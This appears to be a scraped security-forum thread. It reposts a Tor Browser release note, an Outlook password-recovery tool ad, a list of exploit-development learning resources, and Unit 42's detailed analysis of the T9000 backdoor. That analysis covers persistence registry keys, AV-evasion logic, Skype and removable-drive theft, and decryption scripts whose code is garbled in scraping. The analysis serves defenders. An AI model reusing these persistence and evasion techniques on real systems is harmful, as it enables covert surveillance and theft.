Nytro

Tor Browser 5.5.2 is released Tor Browser 5.5.2 is now available from the Tor Browser Project page and also from our distribution directory. This release features important security updates to Firefox. Users on the security level "High" or "Medium-High" were not affected by the bugs in the Graphite font rendering library. The full changelog since 5.5.1 is: Tor Browser 5.5.2 -- February 12 2016 All Platforms Update Firefox to 38.6.1esr Update NoScript to 2.9.0.3 Sursa: https://blog.torproject.org/blog/tor-browser-552-released

"NTP server set to 1.1.1970 on a public hotspot will brick IOS devices (iPad and iPhones), requiring physical repair."

Au mai zis asta si in trecut...

A incercat cineva?

Lasand la o parte promotia, e foarte utila pentru cei care vor sa sune in strainatate si din cate stiu eu se poate folosi si in alte tari (nu stiu in ce conditii/tarife).

Ai OSCP-ul?

Outlook Password Decryptor Outlook stores the password for subsequent logins when user selects the 'Remember Password' option during authentication. The password is stored in the encrypted format and only respective user can decrypt the password. Outlook Password Decryptor can instantly decrypt and recover all these account passwords. For command-line version, check out our new tool - Outlook Password Dump. Note: Outlook Password Decryptor is not hacking or cracking tool as it can only help you to recover your own lost password that is previously stored in your system. Outlook Password Decryptor can recover passwords from all versions beginning with Outlook Express to latest version, Outlook 2015. It works on wide range of platforms starting from Windows XP to new Windows 10 version. Features Outlook Password Decryptor is the all-in-one tool to recover passwords from all versions of Outlook. Also it can decrypt passwords from different type of Email account configurations supported by Outlook, such as Exchange Server IMAP POP3 SMTP LDAP HTTP On starting, it automatically detects the current Outlook version along with user & platform information. It also provides option to save the recovered password list to HTML/TEXT /XML/CSV file for future use. Link: http://securityxploded.com/outlookpassworddecryptor.php

The best resources for learning exploit development Fabio Baroni Penetration tester Books Hacking - The art of exploitation A bug Hunter's Diary: A Guided Tour Through the Wilds of Software Security The Shellcoder's Handbook: Discovering and Exploiting Security Holes Sockets, shellcode, Porting, and coding: reverse engineering Exploits and Tool coding for security professionals Writing Security tools and Exploits Buffer overflow attacks: Detect, exploit, Prevent Metasploit toolkit for Penetration Testing, exploit development, and vulnerability research TUTORIALS Corelan.be https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/ https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/ https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/ https://www.corelan.be/index.php/2010/03/22/ken-ward-zipper-exploit-write-up-on-abysssec-com/ https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/ https://www.corelan.be/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/ https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/ https://www.corelan.be/index.php/2012/12/31/jingle-bofs-jingle-rops-sploiting-all-the-things-with-mona-v2/ https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/ https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/ https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/ https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/ Massimiliano Tomassoli's blog http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/ Samsclass.info https://samsclass.info/127/127_F15.shtml Securitysift.com http://www.securitysift.com/windows-exploit-development-part-1-basics/ http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/ http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/ http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits http://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows Justbeck.com http://www.justbeck.com/getting-started-in-exploit-development/ 0xdabbad00.com http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/ fuzzysecurity.com Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] sploitfun.wordpress.com https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ sneakerhax.com http://sneakerhax.com/jumping-into-exploit-development/ community.rapid7.com https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development--the-series resources.infosecinstitute.com http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/ rafayhackingarticles.net http://www.rafayhackingarticles.net/2011/07/from-minor-bug-to-zero-day-exploit.html TRAININGS Opensecuritytraining.info http://opensecuritytraining.info/Exploits1.html http://opensecuritytraining.info/Exploits2.html Module 12 of Advanced penetration testing cource on Cybrary.it https://www.cybrary.it/course/advanced-penetration-testing/ Securitytube.net http://www.securitytube.net/groups?operation=view&groupId=7 research megaprimer http://www.securitytube.net/groups?operation=view&groupId=4 exploitation for linux megaprimer http://www.securitytube.net/groups?operation=view&groupId=3 Format string vulnerabilities megaprimer infiniteskills.com http://www.infiniteskills.com/training/reverse-engineering-and-exploit-development.html COURSES Corelan https://www.corelan-training.com Offensive Security https://www.offensive-security.com/information-security-training/advanced-windows-exploitation/ AWE (Advanced windowsexploitation) SANS https://www.sans.org/course/advance-exploit-development-pentetration-testers SANS SEC760: Advancedexploitdevelopment for Penetration Testers Udemy https://www.udemy.com/windows-exploit-development-megaprimer/learn/#/ windows exploit developmentMegaprimer by Ajin Abraham TOOLS IDA Pro OllyDbg WinDbg Mona.py HEAP EXPLOITATION TECHNIQUES https://github.com/shellphish/how2heap VULNERABLE APPLICATIONS Exploit-exercises.com https://exploit-exercises.com/protostar/ Protostar https://exploit-exercises.com/fusion/ Fusion 28 hacking sites to practise your skills in a legal way https://www.peerlyst.com/blog-post/practise-your-infosec-skill-on-these-legal-28-hacking-sites EXPLOITS database https://www.exploit-db.com https://www.milw00rm.com http://0day.today https://packetstormsecurity.com http://www.securityfocus.com http://www.windowsexploits.com http://iedb.ir http://www.macexploit.com Sursa: https://www.peerlyst.com/posts/the-best-resources-for-learning-exploit-development

T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques POSTED BY: Josh Grunzweig and Jen Miller-Osborn on February 4, 2016 1:00 PM FILED IN: Malware, Threat Prevention, Unit 42 TAGGED: Skype, T5000, T9000, Trojans Most custom backdoors used by advanced attackers have limited functionality. They evade detection by keeping their code simple and flying under the radar. But during a recent investigation we found a backdoor that takes a very different approach. We refer to this backdoor as T9000, which is a newer variant of the T5000 malware family, also known as Plat1. In addition to the basic functionality all backdoors provide, T9000 allows the attacker to capture encrypted data, take screenshots of specific applications and specifically target Skype users. The malware goes to great lengths to identify a total of 24 potential security products that may be running on a system and customizes its installation mechanism to specifically evade those that are installed. It uses a multi-stage installation process with specific checks at each point to identify if it is undergoing analysis by a security researcher. The primary functionality of this tool is to gather information about the victim. In fact, the author chose to store critical files dropped by the Trojan in a directory named “Intel.” T9000 is pre-configured to automatically capture data about the infected system and steal files of specific types stored on removable media. We have observed T9000 used in multiple targeted attacks against organizations based in the United States. However, the malware’s functionality indicates that the tool is intended for use against a broad range of users. In this report, we share an analysis of each stage in T9000’s execution flow. Stay tuned for a future report in which we will provide more detail on how this tool has been used and the infrastructure we have identified as part of our analysis. T9000 Backdoor Analysis The entire execution flow of the malware is represented in the following diagram: As this malware uses a multistage execution flow, we’ll discuss each stage individually. Initial Exploitation The sample of T9000 used in this analysis was originally dropped via a RTF file that contained exploits for both CVE-2012-1856 and CVE-2015-1641. When triggered, an initial shellcode stage is run, which is responsible for locating and executing a secondary shellcode stub. The second stage shellcode reads the initial RTF document and seeks to the end of the file, using the last four bytes as the size of the embedded payload. With the payload size confirmed, the shellcode will create a file in the %TEMP% folder using a temporary filename. The shellcode will decrypt and subsequently load the embedded payload in the RTF file. The decrypted payload is written to the temporary file and executed using WinExec. The shellcode then attempts to decrypt an embedded decoy document with the same algorithm used to decrypt the payload, which it will save to %TEMP%\~tmp.doc path. This file is opened using the following command: cmd /C %TEMP%\~tmp.doc However, this particular sample did not contain a decoy document. Stage 1 When this temporary file is initially executed, it will begin by creating the following mutex to ensure only one instance of the malware is running at a given time: 820C90CxxA1B084495866C6D95B2595xx1C3 It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\Software\ registry path: Sophos INCAInternet DoctorWeb Baidu Comodo TrustPortAntivirus GData AVG BitDefender VirusChaser McAfee Panda Trend Micro Kingsoft Norton Micropoint Filseclab AhnLab JiangMin Tencent Avira Kaspersky Rising 360 These security products are represented by a value that is binary AND-ed with any other products found. The following numbers represent each respective security product. 0x08000000 : Sophos 0x02000000 : INCAInternet 0x04000000 : DoctorWeb 0x00200000 : Baidu 0x00100000 : Comodo 0x00080000 : TrustPortAntivirus 0x00040000 : GData 0x00020000 : AVG 0x00010000 : BitDefender 0x00008000 : VirusChaser 0x00002000 : McAfee 0x00001000 : Panda 0x00000800 : Trend Micro 0x00000400 : Kingsoft 0x00000200 : Norton 0x00000100 : Micropoint 0x00000080 : Filseclab 0x00000040 : AhnLab 0x00000020 : JiangMin 0x00000010 : Tencent 0x00000004 : Avira 0x00000008 : Kaspersky 0x00000002 : Rising 0x00000001 : 360 So, for example, if both Trend Micro and Sophos were discovered on a victim machine, the resulting value would be 0x08000800. This numerical value is written to the following file: %APPDATA%\Intel\avinfo The malware proceeds to drop the following files to the %APPDATA%\Intel directory: Additionally, the following two files are written to the Data directory: The following table provides a description of each file dropped: File Name Description ~1 Debug information about files used by malware. avinfo Installed security products on victim. hccutils.dll Malicious DLL. Loads ResN32.dll. hccutils.inf Malicious INF file. Points to hccutils.dll. hjwe.dat Encrypted core of malware family. igfxtray.exe Legitimate Microsoft executable. Loads hccutils.dll. qhnj.dat Encrypted plugin. Hooks a number of functions and logs results. QQMgr.dll Malicious DLL. Sets persistence via Run registry key. QQMgr.inf Malicious INF file. Points to QQMgr.dll ResN32.dat String pointing to path of encrypted core of malware. ResN32.dll Malicious DLL. Decrypts, decompresses, and loads core malware. tyeu.dat Encrypted plugin. Takes screenshots and collects Skype information. vnkd.dat Encrypted plugin. Finds files on removable drives on victim machine. dtl.dat Encrypted configuration information. glp.uin Plugin configuration information. You’ll notice that QQMgr* files are not listed in the original malware execution flow diagram. In the event the victim is running any of the following operating system versions, as well as either Kingsoft, Filseclab, or Tencent security products, the malware will be installed using an alternative method. Windows 2008 R2 Windows 7 Windows 2012 Windows 8 In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of ‘QQMgr.inf’. Otherwise, it will use ‘hccutils.inf’ as an argument. QQMgr.inf will install the QQMgr.dll, while hccutils.inf will install the hccutils.dll library. QQMgr.dll will set the following registry key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Eupdate – %APPDATA%\Intel\ResN32.dll The QQMgr.dll file has the following debug string found within it: H:\WORK\PROJECT\InfInstallBypassUAC\Release\BypassUAC.pdb The hccutils.dll file is described later within this post. After the malware drops the required files, by default the malware will spawn %APPDATA%\Intel\igfxtray.exe in a new process, which begins the second stage of the malware’s execution. Stage 2 The igfxtray.exe is a legitimate Microsoft Windows executable that sideloads the malicious hccutils.dll DLL file. This DLL has the following debug string embedded within it: D:\WORK\T9000\hccutils_M4\Release\hccutils.pdb Upon loading this malicious DLL, the malware will initially perform the same queries for security products that were witnessed in stage 1. Three separate techniques for starting stage 3 are used depending on the properties of the victim. The first technique is used if the victim meets the following criteria: Microsoft Windows 8 / Windows Server 2012 R2 DoctorWeb security product installed For this situation, the following registry key is set: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – %SYSTEM%\rundll32.exe %APPDATA\Intel\ResN32.dll Run This ensures that the ResN32.dll library will be run using the ‘Run’ exported function whenever the machine is rebooted. The second technique is used if the victim meets any of the following sets of criteria: Microsoft Windows 8 / Windows Server 2012 R2 Not running Kingsoft, Tencent, or DoctorWeb security products Microsoft Windows XP or lower No security products installed, or running any of the following: Sophos GData TrendMicro AhnLab Kaspersky In these situations, the following persistence technique is used. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1 Setting these registry keys both enables the AppInit_DLL functionality, and ensures that every user mode process that is spawned will load the ResN32.dll library. More information about this can be found here. The third technique is used in any other situation. When this occurs, the malware will first identify the explorer.exe process identifier. It proceeds to inject the ResN32.dll library into this process. At this point, the third stage of the malware family is loaded. Stage 3 The third stage begins when the ResN32.dll file begins operating. This file contains the following debug string: D:\WORK\T9000\ResN_M2\Release\ResN32.pdb The ResN32.dll library begins by spawning a new thread that is responsible for the majority of the capabilities built into this sample. This thread begins by checking the operating system version, and once again runs a query on the various security products installed on the victim machine. Under certain conditions, the following registry key is set, ensuring persistence across reboots: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – c:\windows\system32\rundll32.exe %APPDATA\Intel\ResN32.dll Run Following this, a new thread is created that is responsible for deleting previously written files. This thread creates the following mutex: Global\\deletethread It proceeds to attempt to delete the following files in an infinite loop until said files have been deleted: %STARTUP%\hccutils.dll %STARTUP%\hccutil.dll %STARTUP%\igfxtray.exe The ResN32.dll malware proceeds to read in the ResN32.dat file that was previously written to disk. This file contains a path to the hjwe.dat file, which is subsequently read in. The data within the hjwe.dat file is decrypted using the RC4 algorithm, and subsequently decompressed using the LZMA algorithm. The following script can be used to decrypt the hjwe.dat file, along with the plugins that will be discussed later. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import sys, pylzma from base64 import * from binascii import * from struct import * def rc4( data , key ): S = range(256) j = 0 out = [] for i in range(256): j = (j + S + ord( key[i % len(key)] )) % 256 S , S[j] = S[j] , S i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S ) % 256 S , S[j] = S[j] , S out.append(chr(ord(char) ^ S[(S + S[j]) % 256])) return ''.join(out) f = open(sys.argv[1], 'rb') fd = f.read() f.close() bytes_0_4, bytes_4_8, bytes_8_12, bytes_12_16 = unpack("<IIII", fd[0:16]) if bytes_0_4 == 0xf7e4aa65: length = bytes_8_12 if len(fd)-16 != length: print "[*] Possible error reading in length of data." key_size = 260 key = fd[16:16+key_size] data = fd[16+key_size:] decrypted = rc4(data, key) decompressed = pylzma.decompress_compat(decrypted) f1 = open(sys.argv[1]+".decompressed", 'wb') f1.write(decompressed) f1.close print "[+] Wrote %s" % (sys.argv[1]+".decompressed") After this file has been decrypted and decompressed, it is written to a file in the %TEMP% directory with a file prefix of ‘____RES’. This file, which contains a Windows DLL, is then loaded into the current process. After the malicious library has been loaded, the previously written temporary file is deleted. This begins the last stage of the malware, which will load the core of the malware family. Stage 4 Once the decrypted and decompressed hjwe.dat file is loaded, it begins by checking its parent process against the following list. If the parent process matches the following blacklist, the malicious DLL will exit without performing any malicious activities. winlogon.exe csrss.exe logonui.exe ctfmon.exe drwtsn32.exe logonui.exe explore.exe System Dbgview.exe userinit.exe lsass.exe wmiprvse.exe services.exe inetinfo.exe avp.exe Rtvscan.exe The malware proceeds to collect the username of the victim, as well as the operating system version. It then compares its parent process against the following list of executables: winlogon.exe csrss.exe logonui.exe ctfmon.exe drwtsn32.exe logonui.exe System Dwm.exe QQPCRTP.exe Tasking.exe Taskhost.exe Taskmgr.exe Dbgview.exe suerinit.exe lsass.exe wmiprvse.exe services.exe inetinfo.exe avp.exe Rtvscan.exe Notice the repeated check for the ‘logonui.exe’, as well as the overlap with the previous parent executable check, which implies sloppiness by the malware author. After these checks are performed, the following mutex is created. Global\\{A59CF429-D0DD-4207-88A1-04090680F714} The following folders are then created: utd_CE31 XOLOADER Update The path of these folders is determined by the version of Microsoft Windows running. The following possibilities exist: %ALLUSERSPROFILE%\Documents\My Document\ %PUBLIC%\Downloads\Update\ At this point, the malware will read in the dtl.dat file, which contains configuration data. Data contained with this file starting at offset 0x20 is xor-encrypted using a single-byte key of 0x5F. The following script can be used to extract the IP address and port for the C2 server from this file. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 from struct import * import sys, socket def int2ip(addr): return socket.inet_ntoa(pack("!I", addr)) config_file = sys.argv[1] f = open(config_file, 'rb') fd = f.read() f.close() decrypted = "" for x in fd[32:]: decrypted += chr(ord(x) ^ 0x5f) port = unpack("<I", decrypted[4:8])[0] ip = int2ip(unpack(">I", decrypted[8:12])[0]) print "IP Address : %s" % ip print "Port : %d" % port The malware will then read in and parse the included plugin configuration information, which is found within the glp.uin file that was previously dropped. These included plugins are encrypted and compressed using the same method witnessed by the hjwe.dat file previously. The previously included script can be used to decrypt and decompress the following three plugin files: tyeu.dat vnkd.dat qhnj.dat These three plugins are subsequently loaded after being decrypted and decompressed. An overview of these plugins can be found later in this post. The malware proceeds to create the following event: Global\\{34748A26-4EAD-4331-B039-673612E8A5FC} Additionally, the following three mutexes are created: Global\\{3C6FB3CA-69B1-454f-8B2F-BD157762810E} Global\\{43EE34A9-9063-4d2c-AACD-F5C62B849089} Global\\{A8859547-C62D-4e8b-A82D-BE1479C684C9} The malware will spawn a new thread to handle network communication. The following event is created prior to this communication occurring: Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E} The malware includes proxy support in the event that the victim is behind a web proxy. Network traffic occurs over a binary protocol on the port specified within the configuration. Traffic is xor-encrypted with a single-byte key of 0x55 in an attempt to bypass any network security products that may be in place. Once decrypted, the following traffic is sent by the malware. Figure 1: Decrypted data sent by malware As we can see from the above image, the malware will send out an initial beacon, followed by various collected information from the victim machine. The following information is exfiltrated: Installed security products System time Build Number CPU Architecture (32-bit/64-bit) MAC Address IP Address Hostname Username Parent executable name Plugin configuration information The malware is configured to receive a number of commands. The following command functionalities have been identified. Command Description DIR Directory listing LIR Drive listing RUN Execute command (Either interactively or not) CIT Send command to interactively spawned command CFI Kill interactively spawned process DOW Download file UPL Upload file DEL Delete file DTK Retrieve statistics for file ERR Null command Additionally, the following commands have been identified, however, their functionalities have yet to be fully discovered. PNG PLI PLD FDL OSC OSF SDA QDA TFD SDS SCP FMT STK CRP Plugin #1 – tyeu.dat When this plugin is called with the default exported function, it will create the following mutex: {CE2100CF-3418-4f9a-9D5D-CC7B58C5AC62} When called with the SetCallbackInterface function export, the malicious capabilities of the plugin begin. The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin’s thread. The plugin proceeds to create the following named event: Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E} Multiple threads are then spawned to handle various actions. The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files: %PUBLIC%\Downloads\Update\S[random].dat %ALLUSERSPROFILE%\Documents\My Document\S[random].dat The random data is generated via the current system time. Additionally, when a screenshot is written, one of the following log files has data appended to it: %PUBLIC%\Downloads\Update\Log.txt %ALLUSERSPROFILE%\Documents\My Document\Log.txt Figure 2: Example data found within Log.txt file A second thread is responsible for monitoring the foreground window every 20 seconds. The thread will target the window names set within the plugin configuration. In this particular instance, the malware will target the ‘notepad’ process. When this process is discovered to be running in the foreground window, the malware will take a screenshot of this window. The data is compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files: %PUBLIC%\Downloads\Update\W[random].dat %ALLUSERSPROFILE%\Documents\My Document\W[random].dat Like the previous thread, this one attempts to write another log file to the disk. However, due to a bug within the code of this plugin, the malware author attempts to append the ‘C:\\Windows\\Temp\\Log.txt’ string to the path, resulting in an inaccessible file path. In the event this bug did not exist, the following example data would be written: 08:37:49 2000 [4] PrintKeyTitleWnd: ===>> Process ID : 2000 The third and final thread spawned by this plugin is responsible for collecting information from the Skype program. The malware will use the built-in Skype API to accomplish this. This only takes places if both Skype is running and the victim is logged into Skype. It makes calls to the following functions: SkypeControlAPIDiscover SkypeControlAPIAttach When hooking into the Skype API, the victim is presented with the following dialog: Figure 3: Skype API access request The victim must explicitly allow the malware to access Skype for this particular functionality to work. However, since a legitimate process is requesting access, the user may find him- or herself allowing this access without realizing what is actually happening. Once enabled, the malware will record video calls, audio calls, and chat messages. Audio and video files are stored in the following folder: %APPDATA%\Intel\Skype Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are stored in randomly named .dat files within the Skype folder. When decrypted, we can see that the malware periodically takes images of the video calls. Audio calls are stored as .wav files. Figure 4: A lonely malware reverser is captured on video by the malicious plugin The original name for this plugin is ‘CaptureDLL.dll’. This is aptly named, as we see that this plugin has the following functionality: Capture full desktop screenshots Capture window screenshots of targeted processes Capture Skype audio, video, and chat messages Plugin #2 – vnkd.dat The vnkd.dat plugin has the following debug path, leading us to believe that the original name for this plugin is ‘FlashDiskThief’: e:\WORK\Project\T9000\Windows\Target\FlashDiskThief.pdb When loaded with the default DllEntryPoint exported function, it will create the following mutex: Global\\{6BB1120C-16E9-4c91-96D5-04B42D1611B4} Like the other plugins associated with this malware, the majority of the functionality for this malware resides within the SetCallbackInterface exported function. This function spawns a new thread that begins by registering a new window with a class name and window name of ‘xx’. The plugin proceeds to iterate through all connected drives on the system, looking for removable drives. Figure 5. Plugin check for removable drives Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin’s configured list. In this particular instance, the malware will seek out the following file types: *.doc *.ppt *.xls *.docx *.pptx *.xlsx If one of these file types is found, the malware will create a copy of the file in one of the following paths: %PUBLIC%\Downloads\Update\D[random].tmp %ALLUSERSPROFILE%\Documents\My Document\D[random].tmp The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below. Figure 6: File structure prior to decryption Figure 7: File structure post decryption This concludes the functionality of the vnkd.dat plugin, or FlaskDiskThief as it’s known by the malware’s author. While specific in nature, this plugin allows attackers to collect files being passed around from one machine to another via removable drives. Plugin #3 – qhnj.dat This particular plugin appears to have an original filename of ‘kplugin.dll’ due to debugging information found within the file. The qhnj.dat plugin is responsible for hooking a number of common Microsoft Windows API calls, and logging the results. The following functions are hooked by this plugin: ImmGetCompositionStringA ImmGetCompositionStringW CreateFileW DeleteFileW CopyFileExW MoveFileWithProgressW CreateDirectoryW CreateDirectoryExW RemoveDirectoryW GetClipboardData CryptEncrypt CryptDecrypt The plugin is most likely hooking the ImmGetCompositionString* functions in order to collect information about Unicode characters on the victim machine, such as Chinese, Japanese, and Korean. Hooking the various file and directory operations allows the malware to log what file changes are occurring on the system. When a file is created, copied, moved, or deleted on the system, the malware will check the directory of said file against the following blacklist: \\\\.\\ :\\program files\\ \\AppData\\ \\temporary internet files\\ \\application data\\ \\Local Settings\\ \\cookies\\ \\temp\\ \\history\\ Additionally, the filename is compared against the ‘.tmp’ extension to ensure a temporary file is ignored. Should the file meet the required criteria, this data is logged. Additionally, all folder modifications and clipboard data are logged as well. The Crypt* functions allow the malware to collect sensitive encrypted data sent to and from the victim machine. This is especially useful when viewing network traffic, allowing the attackers to potentially gain access to remote systems used by the victim. All of the data logged by the qhnj.dat plugin file is stored in one of the following file paths. Data is encrypted using a single-byte XOR key of 0x79. %PUBLIC%\Downloads\Update\uai[random].tmp %ALLUSERSPROFILE%\Documents\My Document\uai[random].tmp This last plugin allows the attackers to record important actions taken by the victim, which in turn may allow them to gain additional access as well as insight into the victim’s actions. Conclusion T9000 appears to be the latest version of this Trojan, which has been partially exposed in previous reports. In 2013, Cylance published a report on a group they named “Grand Theft Auto Panda”, which includes some details on the T5000 version of this Trojan. FireEye researchers also noted that the malware was used in an attack in 2014 using a lure related to the disappearance of Malaysian flight MH370. The author of this backdoor has gone to great lengths to avoid being detected and to evade the scrutiny of the malware analysis community. We hope that sharing the details of how this tool works as well as the indicators in the section below will help others defend themselves against attacks using this tool. In a future report, we will detail the infrastructure used by the variants of the malware we have identified and discuss the methods attackers use to infect systems with it. Palo Alto Networks customers are protected from T9000/T5000 attacks through our next-generation security platform, including the following. Threat Prevention signatures for the software vulnerabilities listed in this report are available to detect the exploit files during delivery. Traps is capable of preventing exploitation of the vulnerabilities exploited to install T9000. WildFire classifies all of the malware described in this report as malicious. Anti-malware signatures for the files listed in this report. AutoFocus users can identify the malware discussed in this report with the T5000 tag Indicators of Compromise Hashes RTF File, d5fa43be20aa94baf1737289c5034e2235f1393890fb6f4e8d4104565be52d8c QQMGr.dll, bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f QQMGR.inf, ace7e3535f2f1fe32e693920a9f411eea21682c87a8e6661d3b67330cd221a2a ResN32.dat, aa28db689f73d77babd1c763c53b3e63950f6a15b7c1a974c7481a216dda9afd ResN32.dll, 1cea4e49bd785378d8beb863bb8eb662042dffd18c85b8c14c74a0367071d9a7 hqwe.dat, bb73261072d2ef220b8f87c6bb7488ad2da736790898d61f33a5fb7747abf48b hqwe.dat.decrypted, 7daf3c3dbecb60bee3d5eb3320b20f2648cf26bd9203564ce162c97dcb132569 hccutils.dll, 3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9 hccutils.inf, f05cd0353817bf6c2cab396181464c31c352d6dea07e2d688def261dd6542b27 igfxtray.exe, 21a5818822a0b2d52a068d1e3339ed4c767f4d83b081bf17b837e9b6e112ee61 qhnj.dat, c61dbc7b51caab1d0353cbba9a8f51f65ef167459277c1c16f15eb6c7025cfe3 qhnj.dat.decrypted, 2b973adbb2addf62cf36cef9975cb0193a7ff0b960e2cff2c80560126bee6f37 tyeu.dat, e52b5ed63719a2798314a9c49c42c0ed4eb22a1ac4a2ad30e8bfc899edcea926 tyeu.dat.decrypted, 5fc3dc25276b01d6cb2fb821b83aa596f1d64ae8430c5576b953e3220a01d9aa vnkd.dat, c22b40db7f9f8ebdbde4e5fc3a44e15449f75c40830c88932f9abd541cc78465 vnkd.dat.decrypted, 157e0a9323eaaa911b3847d64ca0d08be8cd26b2573687be461627e410cb1b3f dtl.dat, 00add5c817f89b9ec490885be39398f878fa64a5c3564eaca679226cf73d929e glp.uin, 3fa05f2f73a0c44a5f51f28319c4dc5b8198fb25e1cfcbea5327c9f1b3a871d4 Mutexes 820C90CxxA1B084495866C6D95B2595xx1C3 Global\\deletethread Global\\{A59CF429-D0DD-4207-88A1-04090680F714} Global\\{3C6FB3CA-69B1-454f-8B2F-BD157762810E} Global\\{43EE34A9-9063-4d2c-AACD-F5C62B849089} Global\\{A8859547-C62D-4e8b-A82D-BE1479C684C9} {CE2100CF-3418-4f9a-9D5D-CC7B58C5AC62} Global\\{6BB1120C-16E9-4c91-96D5-04B42D1611B4} Named Events Global\\{34748A26-4EAD-4331-B039-673612E8A5FC} Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E} File Modifications %TEMP%\~tmp.doc %APPDATA%\Intel\avinfo %APPDATA%\Intel\Data\dtl.dat %APPDATA%\Intel\Data\glp.uin %APPDATA%\Intel\Data\ %APPDATA%\Intel\~1 %APPDATA%\Intel\hccutils.dll %APPDATA%\Intel\hccutils.inf %APPDATA%\Intel\hjwe.dat %APPDATA%\Intel\igfxtray.exe %APPDATA%\Intel\qhnj.dat %APPDATA%\Intel\QQMgr.dll %APPDATA%\Intel\QQMgr.inf %APPDATA%\Intel\ResN32.dll %APPDATA%\Intel\ResN32.dat %APPDATA%\Intel\tyeu.dat %APPDATA%\Intel\vnkd.dat %STARTUP%\hccutils.dll %STARTUP%\hccutil.dll %STARTUP%\igfxtray.exe %ALLUSERSPROFILE%\Documents\My Document\utd_CE31 %ALLUSERSPROFILE%\Documents\My Document\XOLOADER %ALLUSERSPROFILE%\Documents\My Document\update %ALLUSERSPROFILE%\Documents\My Document\Log.txt %PUBLIC%\Downloads\Update\utd_CE31 %PUBLIC%\Downloads\Update\XOLOADER %PUBLIC%\Downloads\Update\update %PUBLIC%\Downloads\Update\Log.txt %APPDATA%\Intel\Skype Registry Modifications 